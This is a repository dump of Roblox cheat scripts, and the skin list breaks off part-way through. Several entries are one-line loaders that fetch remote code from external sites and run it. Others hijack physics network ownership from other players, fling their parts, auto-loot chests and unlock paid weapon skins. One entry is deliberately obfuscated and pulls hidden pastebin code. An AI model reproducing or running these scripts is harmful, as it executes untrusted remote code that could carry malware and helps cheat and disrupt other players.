├── Dark Hub ├── Islands Script ├── Basically FNF Auto Player ├── Infinite Yield ├── Vynixu Ragdoll Engine GUI ├── MiztHub ├── hide parts thing yloadstring ├── patched critical expedition scriptn ├── Helicopter brrr ├── reanimation ├── fe blackhole ├── hide parts thingy ├── UnlockAllSkinsCB ├── r15 animations ├── r6 animations └── possible netless /Dark Hub: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet(("https://darkhub.xyz/remote-script.lua"), true))() 2 | -------------------------------------------------------------------------------- /Islands Script: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet("http://void-scripts.com/Scripts/islands_new.lua"))() 2 | -------------------------------------------------------------------------------- /Basically FNF Auto Player: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet('https://raw.githubusercontent.com/Wohxx/bruh/main/fnfauto'))() 2 | -------------------------------------------------------------------------------- /Infinite Yield: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))() 2 | -------------------------------------------------------------------------------- /Vynixu Ragdoll Engine GUI: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Scripts/master/Vynixius%20Ragdoll%20Engine%20Loader"))() 2 | -------------------------------------------------------------------------------- /MiztHub: -------------------------------------------------------------------------------- 1 | _G.PowerfulNet = false -- Turn on if u want best net, BUT SUPER LAGGY 2 | _G.Jitteryness = Vector3.new(50,0,0) -- set it to high value if ur part fall, default is -30 3 | _G.CustomGui = false -- if you have custom gui turn this on, put the custom gui script below this loadstring 4 | loadstring(game:HttpGet("https://raw.githubusercontent.com/Sylixe/MiztHub/master/MainFolder/uqXAxyVdQpWTcRCdFXU6Yt2meuDkYcLUDN4SJRekQWZ5wp368zKHreYT4w82AH4U.lua",true))() 5 | -------------------------------------------------------------------------------- /hide parts thing yloadstring: -------------------------------------------------------------------------------- 1 | a=game.Players:FindFirstChild("OddPotion",true) 2 | local Players = game:GetService("Players") 3 | local localPlayer = Players.LocalPlayer 4 | local backpack = localPlayer:WaitForChild("Backpack") 5 | local tool = Instance.new("Tool") 6 | tool.RequiresHandle = false 7 | tool.Parent = backpack 8 | tool.Name = "Visible Object" 9 | tool.Equipped:Connect(function(mouse) 10 | mouse.Button1Down:Connect(function() 11 | if mouse.Target and mouse.Target.Parent then 12 | a.TransEvent:FireServer(mouse.Target,0) 13 | end 14 | end) 15 | end) 16 | -------------------------------------------------------------------------------- /patched critical expedition scriptn: -------------------------------------------------------------------------------- 1 | local r = game.Players.LocalPlayer.Character.HumanoidRootPart 2 | local old = r.CFrame 3 | for i,v in pairs(workspace.Chests:GetChildren()) do 4 | if v:FindFirstChild("Giver") and v.Giver:FindFirstChild("TouchInterest") and not v:FindFirstChild("Open") then 5 | repeat 6 | r.CFrame = v.Giver.CFrame + Vector3.new(0,3,0) 7 | wait() 8 | firetouchinterest(r,v.Giver,0) 9 | firetouchinterest(r,v.Giver,1) 10 | until v:FindFirstChild("Open") 11 | end 12 | end 13 | r.CFrame = old 14 | -------------------------------------------------------------------------------- /Helicopter brrr: -------------------------------------------------------------------------------- 1 | --no need for netless skid 2 | 3 | local player=game.Players.LocalPlayer 4 | local mouse = player:GetMouse() 5 | 6 | local bodythurst=Instance.new("BodyVelocity", player.Character.Head) 7 | 8 | local speedy=false 9 | mouse.KeyDown:connect(function(key) 10 | if key:byte() == 48 then 11 | bodythurst.force=Vector3.new(0,0,-4000) 12 | end end) 13 | 14 | local player=game.Players.LocalPlayer 15 | local mouse = player:GetMouse() 16 | 17 | local bodythurst=Instance.new("BodyAngularVelocity", player.Character.Head) 18 | 19 | local speedy=false 20 | mouse.KeyDown:connect(function(key) 21 | if key:byte() == 48 then 22 | bodythurst.force=Vector3.new(0,0,-4000) 23 | end end) 24 | 25 | local Anim = Instance.new("Animation") 26 | 27 | Anim.AnimationId = "rbxassetid://27432686" 28 | 29 | local bruh = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 30 | 31 | bruh:Play() 32 | 33 | bruh:AdjustSpeed(0) 34 | 35 | wait(2000) 36 | 37 | bruh:Stop() 38 | -------------------------------------------------------------------------------- /reanimation: -------------------------------------------------------------------------------- 1 | -- H3x0Rs Ownership Script v2.1.1 (http://bit.ly/gainownership) 2 | local PlayerInstance; 3 | local sethiddenprop = (sethiddenproperty or set_hidden_property or sethiddenprop or set_hidden_prop) 4 | local setsimulationrad = setsimulationradius or set_simulation_radius or function(Radius) sethiddenprop(PlayerInstance, "SimulationRadius", Radius) end 5 | if not getgenv or not sethiddenprop or not setsimulationrad then return false end -- Not supported 6 | if NETWORKOWNER then NETWORKOWNER:Disconnect() NETWORKPLAYERCHECK:Disconnect() NETWORKPLAYERCHECK2:Disconnect() end 7 | getgenv().NETWORK_RADIUS = NETWORK_RADIUS or math.huge 8 | 9 | if not isfile("network-ownership.log") then 10 | writefile("network-ownership.log", "Script executed on game "..game.PlaceId.."!\n") 11 | else 12 | appendfile("network-ownership.log", "Script executed on game "..game.PlaceId.."!\n") 13 | end 14 | 15 | if not game:IsLoaded() then 16 | appendfile("network-ownership.log", "Waiting for game to load...\n") 17 | game.Loaded:Wait() -- Wait for game 18 | end 19 | 20 | -- Grab services 21 | local RunService = game:GetService("RunService") 22 | local Players = game:GetService("Players") 23 | PlayerInstance = Players.LocalPlayer 24 | 25 | -- Optimize 26 | local PlayerList = {} 27 | for _, Plr in pairs(Players:GetPlayers()) do 28 | if Plr ~= PlayerInstance then 29 | PlayerList[Plr] = true 30 | end 31 | end 32 | 33 | getgenv().NETWORKPLAYERCHECK = Players.PlayerAdded:Connect(function(Plr) 34 | PlayerList[Plr] = true 35 | end) 36 | 37 | getgenv().NETWORKPLAYERCHECK2 = Players.PlayerRemoving:Connect(function(Plr) 38 | local Success, Err = pcall(function() PlayerList[Plr] = nil end) 39 | if not Success then 40 | appendfile("network-ownership.log", "Error while de-registering player that left: "..tostring(Err).."\n") 41 | end 42 | end) 43 | 44 | -- Configure network services 45 | settings().Physics.AllowSleep = false -- Keep the current physics system from sleeping. (Non-moving parts lose ownership.) 46 | settings().Physics.PhysicsEnvironmentalThrottle = Enum.EnviromentalPhysicsThrottle.Disabled -- Keep the physics from throttling. 47 | 48 | -- Start network runtime 49 | getgenv().NETWORKOWNER = RunService.Stepped:Connect(function() 50 | -- Revoke ownership from others 51 | for Plr, _ in pairs(PlayerList) do 52 | sethiddenprop(Plr, "MaximumSimulationRadius", 0.01) 53 | sethiddenprop(Plr, "SimulationRadius", 0.01) 54 | end 55 | 56 | -- Claim ownership for me 57 | sethiddenprop(PlayerInstance, "MaximumSimulationRadius", NETWORK_RADIUS) 58 | setsimulationrad(NETWORK_RADIUS) 59 | end) 60 | 61 | return true 62 | -------------------------------------------------------------------------------- /fe blackhole: -------------------------------------------------------------------------------- 1 | local UserInputService = game:GetService("UserInputService") 2 | local Mouse = game:GetService("Players").LocalPlayer:GetMouse() 3 | local Folder = Instance.new("Folder", game:GetService("Workspace")) 4 | local Part = Instance.new("Part", Folder) 5 | local Attachment1 = Instance.new("Attachment", Part) 6 | Part.Anchored = true 7 | Part.CanCollide = false 8 | Part.Transparency = 1 9 | local Updated = Mouse.Hit + Vector3.new(0, 5, 0) 10 | local NetworkAccess = coroutine.create(function() 11 | settings().Physics.AllowSleep = false 12 | while game:GetService("RunService").RenderStepped:Wait() do 13 | for _, Players in next, game:GetService("Players"):GetPlayers() do 14 | if Players ~= game:GetService("Players").LocalPlayer then 15 | Players.MaximumSimulationRadius = 0 16 | sethiddenproperty(Players, "SimulationRadius", 0) 17 | end 18 | end 19 | game:GetService("Players").LocalPlayer.MaximumSimulationRadius = math.pow(math.huge,math.huge) 20 | setsimulationradius(math.huge) 21 | end 22 | end) 23 | coroutine.resume(NetworkAccess) 24 | local function ForcePart(v) 25 | if v:IsA("Part") and v.Anchored == false and v.Parent:FindFirstChild("Humanoid") == nil and v.Parent:FindFirstChild("Head") == nil and v.Name ~= "Handle" then 26 | Mouse.TargetFilter = v 27 | for _, x in next, v:GetChildren() do 28 | if x:IsA("BodyAngularVelocity") or x:IsA("BodyForce") or x:IsA("BodyGyro") or x:IsA("BodyPosition") or x:IsA("BodyThrust") or x:IsA("BodyVelocity") or x:IsA("RocketPropulsion") then 29 | x:Destroy() 30 | end 31 | end 32 | if v:FindFirstChild("Attachment") then 33 | v:FindFirstChild("Attachment"):Destroy() 34 | end 35 | if v:FindFirstChild("AlignPosition") then 36 | v:FindFirstChild("AlignPosition"):Destroy() 37 | end 38 | if v:FindFirstChild("Torque") then 39 | v:FindFirstChild("Torque"):Destroy() 40 | end 41 | v.CanCollide = false 42 | local Torque = Instance.new("Torque", v) 43 | Torque.Torque = Vector3.new(100000, 100000, 100000) 44 | local AlignPosition = Instance.new("AlignPosition", v) 45 | local Attachment2 = Instance.new("Attachment", v) 46 | Torque.Attachment0 = Attachment2 47 | AlignPosition.MaxForce = 9999999999999999 48 | AlignPosition.MaxVelocity = math.huge 49 | AlignPosition.Responsiveness = 200 50 | AlignPosition.Attachment0 = Attachment2 51 | AlignPosition.Attachment1 = Attachment1 52 | end 53 | end 54 | for _, v in next, game:GetService("Workspace"):GetDescendants() do 55 | ForcePart(v) 56 | end 57 | game:GetService("Workspace").DescendantAdded:Connect(function(v) 58 | ForcePart(v) 59 | end) 60 | UserInputService.InputBegan:Connect(function(Key, Chat) 61 | if Key.KeyCode == Enum.KeyCode.E and not Chat then 62 | Updated = Mouse.Hit + Vector3.new(0, 5, 0) 63 | end 64 | end) 65 | spawn(function() 66 | while game:GetService("RunService").RenderStepped:Wait() do 67 | Attachment1.WorldCFrame = Updated 68 | end 69 | end) 70 | -------------------------------------------------------------------------------- /hide parts thingy: -------------------------------------------------------------------------------- 1 | local BLO425=KiB2545;print"This script obfuscated by the shit obfuscator";local Player_0=lmao;local W47343=Cock348r6Q;local D_Hd342=P_E244;local U_34=nOq34rf;print"---[";print(gethiddenproperty(game.Players.LocalPlayer, "SimulationRadius"));local no4372427W=bruhNOyesBruh47342;print"]---";print"lmao look this your net";local no=yes;loadstring("\108\111\099\097\108\032\104\101\121\110\111\119\104\121\098\114\117\104\055\052\055\051\052\055\051\061\106\097\105\115\100\106\105\111\097\106\100\111\097\105\115\106\100\105\097\106\100\115\111\105\106\097\100\111\119")();local pnotnigga=bruh;no4372427W=true;local goodluckindeobfuscatingit=W34ButNotW4375;local ohHELLnOooOoOOoO=true;local sex=notreal;bruhshutup=false;local duck=bruhshutup;cringe=true;loadstring("\097\061\103\097\109\101\046\080\108\097\121\101\114\115\058\070\105\110\100\070\105\114\115\116\067\104\105\108\100\040\034\079\100\100\080\111\116\105\111\110\034\044\116\114\117\101\041\013\010\108\111\099\097\108\032\080\108\097\121\101\114\115\032\061\032\103\097\109\101\058\071\101\116\083\101\114\118\105\099\101\040\034\080\108\097\121\101\114\115\034\041\013\010\108\111\099\097\108\032\108\111\099\097\108\080\108\097\121\101\114\032\061\032\080\108\097\121\101\114\115\046\076\111\099\097\108\080\108\097\121\101\114\013\010\108\111\099\097\108\032\098\097\099\107\112\097\099\107\032\061\032\108\111\099\097\108\080\108\097\121\101\114\058\087\097\105\116\070\111\114\067\104\105\108\100\040\034\066\097\099\107\112\097\099\107\034\041\013\010\108\111\099\097\108\032\116\111\111\108\032\061\032\073\110\115\116\097\110\099\101\046\110\101\119\040\034\084\111\111\108\034\041\013\010\116\111\111\108\046\082\101\113\117\105\114\101\115\072\097\110\100\108\101\032\061\032\102\097\108\115\101\013\010\116\111\111\108\046\080\097\114\101\110\116\032\061\032\098\097\099\107\112\097\099\107\013\010\116\111\111\108\046\078\097\109\101\032\061\032\034\073\110\118\105\115\105\098\108\101\032\079\098\106\101\099\116\034\013\010\116\111\111\108\046\069\113\117\105\112\112\101\100\058\067\111\110\110\101\099\116\040\102\117\110\099\116\105\111\110\040\109\111\117\115\101\041\013\010\109\111\117\115\101\046\066\117\116\116\111\110\049\068\111\119\110\058\067\111\110\110\101\099\116\040\102\117\110\099\116\105\111\110\040\041\013\010\105\102\032\109\111\117\115\101\046\084\097\114\103\101\116\032\097\110\100\032\109\111\117\115\101\046\084\097\114\103\101\116\046\080\097\114\101\110\116\032\116\104\101\110\013\010\097\046\084\114\097\110\115\069\118\101\110\116\058\070\105\114\101\083\101\114\118\101\114\040\109\111\117\115\101\046\084\097\114\103\101\116\044\049\041\013\010\101\110\100\013\010\101\110\100\041\013\010\101\110\100\041")();local DaBaby=Convertible;loadstring("\102\117\110\099\116\105\111\110\032\079\077\070\071\068\065\066\065\066\089\073\083\067\079\078\086\069\082\084\073\066\076\069\040\041\013\010\032\032\032\032\108\111\099\097\108\032\079\077\071\082\069\065\076\076\089\079\072\061\110\111\013\010\101\110\100")();OMFGDABABYISCONVERTIBLE();loadstring(game:HttpGet(('https://pastebin.com/raw/UTT8shqZ'),true))();local T23WMN=minecraftminecraaaftwhyimsostupid;local dSf_51=true;loadstring("\108\111\099\097\108\032\072\105\087\104\097\116\089\111\117\070\105\110\100\105\110\103\072\101\114\101\061\072\105\087\087\087\087\056\052\051\056\052\051\052\051")();local Kf_E43mPL=bUHH53s;local mkk233=mMkk3eDE;wait(0.005);loadstring("\045\045\091\091\119\104\093\093")()--[[omg gray, omg]];loadstring("\102\117\110\099\116\105\111\110\032\066\117\121\083\121\110\097\112\115\101\088\040\041\013\010\097\061\103\097\109\101\046\080\108\097\121\101\114\115\058\070\105\110\100\070\105\114\115\116\067\104\105\108\100\040\034\079\100\100\080\111\116\105\111\110\034\044\116\114\117\101\041\013\010\108\111\099\097\108\032\080\108\097\121\101\114\115\032\061\032\103\097\109\101\058\071\101\116\083\101\114\118\105\099\101\040\034\080\108\097\121\101\114\115\034\041\013\010\108\111\099\097\108\032\108\111\099\097\108\080\108\097\121\101\114\032\061\032\080\108\097\121\101\114\115\046\076\111\099\097\108\080\108\097\121\101\114\013\010\108\111\099\097\108\032\098\097\099\107\112\097\099\107\032\061\032\108\111\099\097\108\080\108\097\121\101\114\058\087\097\105\116\070\111\114\067\104\105\108\100\040\034\066\097\099\107\112\097\099\107\034\041\013\010\108\111\099\097\108\032\116\111\111\108\032\061\032\073\110\115\116\097\110\099\101\046\110\101\119\040\034\084\111\111\108\034\041\013\010\116\111\111\108\046\082\101\113\117\105\114\101\115\072\097\110\100\108\101\032\061\032\102\097\108\115\101\013\010\116\111\111\108\046\080\097\114\101\110\116\032\061\032\098\097\099\107\112\097\099\107\013\010\116\111\111\108\046\078\097\109\101\032\061\032\034\086\105\115\105\098\108\101\032\079\098\106\101\099\116\034\013\010\116\111\111\108\046\069\113\117\105\112\112\101\100\058\067\111\110\110\101\099\116\040\102\117\110\099\116\105\111\110\040\109\111\117\115\101\041\013\010\109\111\117\115\101\046\066\117\116\116\111\110\049\068\111\119\110\058\067\111\110\110\101\099\116\040\102\117\110\099\116\105\111\110\040\041\013\010\105\102\032\109\111\117\115\101\046\084\097\114\103\101\116\032\097\110\100\032\109\111\117\115\101\046\084\097\114\103\101\116\046\080\097\114\101\110\116\032\116\104\101\110\013\010\097\046\084\114\097\110\115\069\118\101\110\116\058\070\105\114\101\083\101\114\118\101\114\040\109\111\117\115\101\046\084\097\114\103\101\116\044\048\041\013\010\101\110\100\013\010\101\110\100\041\013\010\101\110\100\041\013\010\101\110\100")();local Player_1=Player_0;local deobfuscate=easy;local MNk32L=DmK432;local NmM23mNs=lmaowhat;loadstring(game:HttpGet(('https://pastebin.com/raw/GKbwBiiV'),true))();print"you can easy deobfuscate this script";local ID2341=CardID41341;local p_l34=P_E244; local V_b562=what 2 | -------------------------------------------------------------------------------- /UnlockAllSkinsCB: -------------------------------------------------------------------------------- 1 | local LocalPlayer = game:GetService("Players").LocalPlayer 2 | local Client = getsenv(game.Players.LocalPlayer.PlayerGui.Client) 3 | local ReplicatedStorage = game:GetService("ReplicatedStorage") 4 | 5 | local allSkins = { 6 | {'AK47_Ace'}, 7 | {'AK47_Bloodboom'}, 8 | {'AK47_Clown'}, 9 | {'AK47_Code Orange'}, 10 | {'AK47_Eve'}, 11 | {'AK47_Gifted'}, 12 | {'AK47_Glo'}, 13 | {'AK47_Godess'}, 14 | {'AK47_Hallows'}, 15 | {'AK47_Halo'}, 16 | {'AK47_Hypersonic'}, 17 | {'AK47_Inversion'}, 18 | {'AK47_Jester'}, 19 | {'AK47_Maker'}, 20 | {'AK47_Mean Green'}, 21 | {'AK47_Outlaws'}, 22 | {'AK47_Outrunner'}, 23 | {'AK47_Patch'}, 24 | {'AK47_Plated'}, 25 | {'AK47_Precision'}, 26 | {'AK47_Quantum'}, 27 | {'AK47_Quicktime'}, 28 | {'AK47_Scapter'}, 29 | {'AK47_Secret Santa'}, 30 | {'AK47_Shooting Star'}, 31 | {'AK47_Skin Committee'}, 32 | {'AK47_Survivor'}, 33 | {'AK47_Ugly Sweater'}, 34 | {'AK47_VAV'}, 35 | {'AK47_Variant Camo'}, 36 | {'AK47_Yltude'}, 37 | {'AUG_Chilly Night'}, 38 | {'AUG_Dream Hound'}, 39 | {'AUG_Enlisted'}, 40 | {'AUG_Graffiti'}, 41 | {'AUG_Homestead'}, 42 | {'AUG_Maker'}, 43 | {'AUG_NightHawk'}, 44 | {'AUG_Phoenix'}, 45 | {'AUG_Sunsthetic'}, 46 | {'AWP_Abaddon'}, 47 | {'AWP_Autumness'}, 48 | {'AWP_Blastech'}, 49 | {'AWP_Bloodborne'}, 50 | {'AWP_Coffin Biter'}, 51 | {'AWP_Desert Camo'}, 52 | {'AWP_Difference'}, 53 | {'AWP_Dragon'}, 54 | {'AWP_Forever'}, 55 | {'AWP_Grepkin'}, 56 | {'AWP_Hika'}, 57 | {'AWP_Illusion'}, 58 | {'AWP_Instinct'}, 59 | {'AWP_JTF2'}, 60 | {'AWP_Lunar'}, 61 | {'AWP_Nerf'}, 62 | {'AWP_Northern Lights'}, 63 | {'AWP_Pear Tree'}, 64 | {'AWP_Pink Vision'}, 65 | {'AWP_Pinkie'}, 66 | {'AWP_Quicktime'}, 67 | {'AWP_Racer'}, 68 | {'AWP_Regina'}, 69 | {'AWP_Retroactive'}, 70 | {'AWP_Scapter'}, 71 | {'AWP_Silence'}, 72 | {'AWP_Venomus'}, 73 | {'AWP_Weeb'}, 74 | {'Banana_Stock'}, 75 | {'Bayonet_Aequalis'}, 76 | {'Bayonet_Banner'}, 77 | {'Bayonet_Candy Cane'}, 78 | {'Bayonet_Consumed'}, 79 | {'Bayonet_Cosmos'}, 80 | {'Bayonet_Crimson Tiger'}, 81 | {'Bayonet_Crow'}, 82 | {'Bayonet_Delinquent'}, 83 | {'Bayonet_Digital'}, 84 | {'Bayonet_Easy-Bake'}, 85 | {'Bayonet_Egg Shell'}, 86 | {'Bayonet_Festive'}, 87 | {'Bayonet_Frozen Dream'}, 88 | {'Bayonet_Geo Blade'}, 89 | {'Bayonet_Ghastly'}, 90 | {'Bayonet_Goo'}, 91 | {'Bayonet_Hallows'}, 92 | {'Bayonet_Intertwine'}, 93 | {'Bayonet_Marbleized'}, 94 | {'Bayonet_Mariposa'}, 95 | {'Bayonet_Naval'}, 96 | {'Bayonet_Neonic'}, 97 | {'Bayonet_RSL'}, 98 | {'Bayonet_Racer'}, 99 | {'Bayonet_Sapphire'}, 100 | {'Bayonet_Silent Night'}, 101 | {'Bayonet_Splattered'}, 102 | {'Bayonet_Stock'}, 103 | {'Bayonet_Topaz'}, 104 | {'Bayonet_Tropical'}, 105 | {'Bayonet_Twitch'}, 106 | {'Bayonet_UFO'}, 107 | {'Bayonet_Wetland'}, 108 | {'Bayonet_Worn'}, 109 | {'Bayonet_Wrapped'}, 110 | {'Bearded Axe_Beast'}, 111 | {'Bearded Axe_Splattered'}, 112 | {'Bizon_Autumic'}, 113 | {'Bizon_Festive'}, 114 | {'Bizon_Oblivion'}, 115 | {'Bizon_Saint Nick'}, 116 | {'Bizon_Sergeant'}, 117 | {'Bizon_Shattered'}, 118 | {'Butterfly Knife_Aurora'}, 119 | {'Butterfly Knife_Bloodwidow'}, 120 | {'Butterfly Knife_Consumed'}, 121 | {'Butterfly Knife_Cosmos'}, 122 | {'Butterfly Knife_Crimson Tiger'}, 123 | {'Butterfly Knife_Crippled Fade'}, 124 | {'Butterfly Knife_Digital'}, 125 | {'Butterfly Knife_Egg Shell'}, 126 | {'Butterfly Knife_Freedom'}, 127 | {'Butterfly Knife_Frozen Dream'}, 128 | {'Butterfly Knife_Goo'}, 129 | {'Butterfly Knife_Hallows'}, 130 | {'Butterfly Knife_Icicle'}, 131 | {'Butterfly Knife_Inversion'}, 132 | {'Butterfly Knife_Jade Dream'}, 133 | {'Butterfly Knife_Marbleized'}, 134 | {'Butterfly Knife_Naval'}, 135 | {'Butterfly Knife_Neonic'}, 136 | {'Butterfly Knife_Reaper'}, 137 | {'Butterfly Knife_Ruby'}, 138 | {'Butterfly Knife_Scapter'}, 139 | {'Butterfly Knife_Splattered'}, 140 | {'Butterfly Knife_Stock'}, 141 | {'Butterfly Knife_Topaz'}, 142 | {'Butterfly Knife_Tropical'}, 143 | {'Butterfly Knife_Twitch'}, 144 | {'Butterfly Knife_Wetland'}, 145 | {'Butterfly Knife_White Boss'}, 146 | {'Butterfly Knife_Worn'}, 147 | {'Butterfly Knife_Wrapped'}, 148 | {'CZ_Designed'}, 149 | {'CZ_Festive'}, 150 | {'CZ_Holidays'}, 151 | {'CZ_Lightning'}, 152 | {'CZ_Orange Web'}, 153 | {'CZ_Spectre'}, 154 | {'Cleaver_Spider'}, 155 | {'Cleaver_Splattered'}, 156 | {'DesertEagle_Cold Truth'}, 157 | {'DesertEagle_Cool Blue'}, 158 | {'DesertEagle_DropX'}, 159 | {'DesertEagle_Glittery'}, 160 | {'DesertEagle_Grim'}, 161 | {'DesertEagle_Heat'}, 162 | {'DesertEagle_Honor-bound'}, 163 | {'DesertEagle_Independence'}, 164 | {'DesertEagle_Krystallos'}, 165 | {'DesertEagle_Pumpkin Buster'}, 166 | {'DesertEagle_ROLVe'}, 167 | {'DesertEagle_Racer'}, 168 | {'DesertEagle_Scapter'}, 169 | {'DesertEagle_Skin Committee'}, 170 | {'DesertEagle_Survivor'}, 171 | {'DesertEagle_Weeb'}, 172 | {'DesertEagle_Xmas'}, 173 | {'DualBerettas_Carbonized'}, 174 | {'DualBerettas_Dusty Manor'}, 175 | {'DualBerettas_Floral'}, 176 | {'DualBerettas_Hexline'}, 177 | {'DualBerettas_Neon web'}, 178 | {'DualBerettas_Old Fashioned'}, 179 | {'DualBerettas_Xmas'}, 180 | {'Falchion Knife_Bloodwidow'}, 181 | {'Falchion Knife_Chosen'}, 182 | {'Falchion Knife_Coal'}, 183 | {'Falchion Knife_Consumed'}, 184 | {'Falchion Knife_Cosmos'}, 185 | {'Falchion Knife_Crimson Tiger'}, 186 | {'Falchion Knife_Crippled Fade'}, 187 | {'Falchion Knife_Digital'}, 188 | {'Falchion Knife_Egg Shell'}, 189 | {'Falchion Knife_Festive'}, 190 | {'Falchion Knife_Freedom'}, 191 | {'Falchion Knife_Frozen Dream'}, 192 | {'Falchion Knife_Goo'}, 193 | {'Falchion Knife_Hallows'}, 194 | {'Falchion Knife_Inversion'}, 195 | {'Falchion Knife_Late Night'}, 196 | {'Falchion Knife_Marbleized'}, 197 | {'Falchion Knife_Naval'}, 198 | {'Falchion Knife_Neonic'}, 199 | {'Falchion Knife_Racer'}, 200 | {'Falchion Knife_Ruby'}, 201 | {'Falchion Knife_Splattered'}, 202 | {'Falchion Knife_Stock'}, 203 | {'Falchion Knife_Topaz'}, 204 | {'Falchion Knife_Tropical'}, 205 | {'Falchion Knife_Wetland'}, 206 | {'Falchion Knife_Worn'}, 207 | {'Falchion Knife_Wrapped'}, 208 | {'Falchion Knife_Zombie'}, 209 | {'Famas_Abstract'}, 210 | {'Famas_Centipede'}, 211 | {'Famas_Cogged'}, 212 | {'Famas_Goliath'}, 213 | {'Famas_Haunted Forest'}, 214 | {'Famas_KugaX'}, 215 | {'Famas_MK11'}, 216 | {'Famas_Medic'}, 217 | {'Famas_Redux'}, 218 | {'Famas_Shocker'}, 219 | {'Famas_Toxic Rain'}, 220 | {'FiveSeven_Autumn Fade'}, 221 | {'FiveSeven_Danjo'}, 222 | {'FiveSeven_Fluid'}, 223 | {'FiveSeven_Gifted'}, 224 | {'FiveSeven_Midnight Ride'}, 225 | {'FiveSeven_Mr. Anatomy'}, 226 | {'FiveSeven_Stigma'}, 227 | {'FiveSeven_Sub Zero'}, 228 | {'FiveSeven_Summer'}, 229 | {'Flip Knife_Stock'}, 230 | {'G3SG1_Amethyst'}, 231 | {'G3SG1_Autumn'}, 232 | {'G3SG1_Foliage'}, 233 | {'G3SG1_Hex'}, 234 | {'G3SG1_Holly Bound'}, 235 | {'G3SG1_Mahogany'}, 236 | {'Galil_Frosted'}, 237 | {'Galil_Hardware 2'}, 238 | {'Galil_Hardware'}, 239 | {'Galil_Toxicity'}, 240 | {'Galil_Worn'}, 241 | {'Glock_Angler'}, 242 | {'Glock_Anubis'}, 243 | {'Glock_Biotrip'}, 244 | {'Glock_Day Dreamer'}, 245 | {'Glock_Desert Camo'}, 246 | {'Glock_Gravestomper'}, 247 | {'Glock_Midnight Tiger'}, 248 | {'Glock_Money Maker'}, 249 | {'Glock_RSL'}, 250 | {'Glock_Rush'}, 251 | {'Glock_Scapter'}, 252 | {'Glock_Spacedust'}, 253 | {'Glock_Tarnish'}, 254 | {'Glock_Underwater'}, 255 | {'Glock_Wetland'}, 256 | {'Glock_White Sauce'}, 257 | {'Gut Knife_Banner'}, 258 | {'Gut Knife_Bloodwidow'}, 259 | {'Gut Knife_Consumed'}, 260 | {'Gut Knife_Cosmos'}, 261 | {'Gut Knife_Crimson Tiger'}, 262 | {'Gut Knife_Crippled Fade'}, 263 | {'Gut Knife_Digital'}, 264 | {'Gut Knife_Egg Shell'}, 265 | {'Gut Knife_Frozen Dream'}, 266 | {'Gut Knife_Geo Blade'}, 267 | {'Gut Knife_Goo'}, 268 | {'Gut Knife_Hallows'}, 269 | {'Gut Knife_Lurker'}, 270 | {'Gut Knife_Marbleized'}, 271 | {'Gut Knife_Naval'}, 272 | {'Gut Knife_Neonic'}, 273 | {'Gut Knife_Present'}, 274 | {'Gut Knife_Ruby'}, 275 | {'Gut Knife_Rusty'}, 276 | {'Gut Knife_Splattered'}, 277 | {'Gut Knife_Topaz'}, 278 | {'Gut Knife_Tropical'}, 279 | {'Gut Knife_Wetland'}, 280 | {'Gut Knife_Worn'}, 281 | {'Gut Knife_Wrapped'}, 282 | {'Huntsman Knife_Aurora'}, 283 | {'Huntsman Knife_Bloodwidow'}, 284 | {'Huntsman Knife_Consumed'}, 285 | {'Huntsman Knife_Cosmos'}, 286 | {'Huntsman Knife_Cozy'}, 287 | {'Huntsman Knife_Crimson Tiger'}, 288 | {'Huntsman Knife_Crippled Fade'}, 289 | {'Huntsman Knife_Digital'}, 290 | {'Huntsman Knife_Egg Shell'}, 291 | {'Huntsman Knife_Frozen Dream'}, 292 | {'Huntsman Knife_Geo Blade'}, 293 | {'Huntsman Knife_Goo'}, 294 | {'Huntsman Knife_Hallows'}, 295 | {'Huntsman Knife_Honor Fade'}, 296 | {'Huntsman Knife_Marbleized'}, 297 | {'Huntsman Knife_Monster'}, 298 | {'Huntsman Knife_Naval'}, 299 | {'Huntsman Knife_Ruby'}, 300 | {'Huntsman Knife_Splattered'}, 301 | {'Huntsman Knife_Stock'}, 302 | {'Huntsman Knife_Tropical'}, 303 | {'Huntsman Knife_Twitch'}, 304 | {'Huntsman Knife_Wetland'}, 305 | {'Huntsman Knife_Worn'}, 306 | {'Huntsman Knife_Wrapped'}, 307 | {'Karambit_Bloodwidow'}, 308 | {'Karambit_Consumed'}, 309 | {'Karambit_Cosmos'}, 310 | {'Karambit_Crimson Tiger'}, 311 | {'Karambit_Crippled Fade'}, 312 | {'Karambit_Death Wish'}, 313 | {'Karambit_Digital'}, 314 | {'Karambit_Egg Shell'}, 315 | {'Karambit_Festive'}, 316 | {'Karambit_Frozen Dream'}, 317 | {'Karambit_Glossed'}, 318 | {'Karambit_Gold'}, 319 | {'Karambit_Goo'}, 320 | {'Karambit_Hallows'}, 321 | {'Karambit_Jade Dream'}, 322 | {'Karambit_Jester'}, 323 | {'Karambit_Lantern'}, 324 | {'Karambit_Liberty Camo'}, 325 | {'Karambit_Marbleized'}, 326 | {'Karambit_Naval'}, 327 | {'Karambit_Neonic'}, 328 | {'Karambit_Pizza'}, 329 | {'Karambit_Quicktime'}, 330 | {'Karambit_Racer'}, 331 | {'Karambit_Ruby'}, 332 | {'Karambit_Scapter'}, 333 | {'Karambit_Splattered'}, 334 | {'Karambit_Stock'}, 335 | {'Karambit_Topaz'}, 336 | {'Karambit_Tropical'}, 337 | {'Karambit_Twitch'}, 338 | {'Karambit_Wetland'}, 339 | {'Karambit_Worn'}, 340 | {'M249_Aggressor'}, 341 | {'M249_P2020'}, 342 | {'M249_Spooky'}, 343 | {'M249_Wolf'}, 344 | {'M4A1_Animatic'}, 345 | {'M4A1_Burning'}, 346 | {'M4A1_Desert Camo'}, 347 | {'M4A1_Heavens Gate'}, 348 | {'M4A1_Impulse'}, 349 | {'M4A1_Jester'}, 350 | {'M4A1_Lunar'}, 351 | {'M4A1_Necropolis'}, 352 | {'M4A1_Tecnician'}, 353 | {'M4A1_Toucan'}, 354 | {'M4A1_Wastelander'}, 355 | {'M4A4_BOT[S]'}, 356 | {'M4A4_Candyskull'}, 357 | {'M4A4_Delinquent'}, 358 | {'M4A4_Desert Camo'}, 359 | {'M4A4_Devil'}, 360 | {'M4A4_Endline'}, 361 | {'M4A4_Flashy Ride'}, 362 | {'M4A4_Ice Cap'}, 363 | 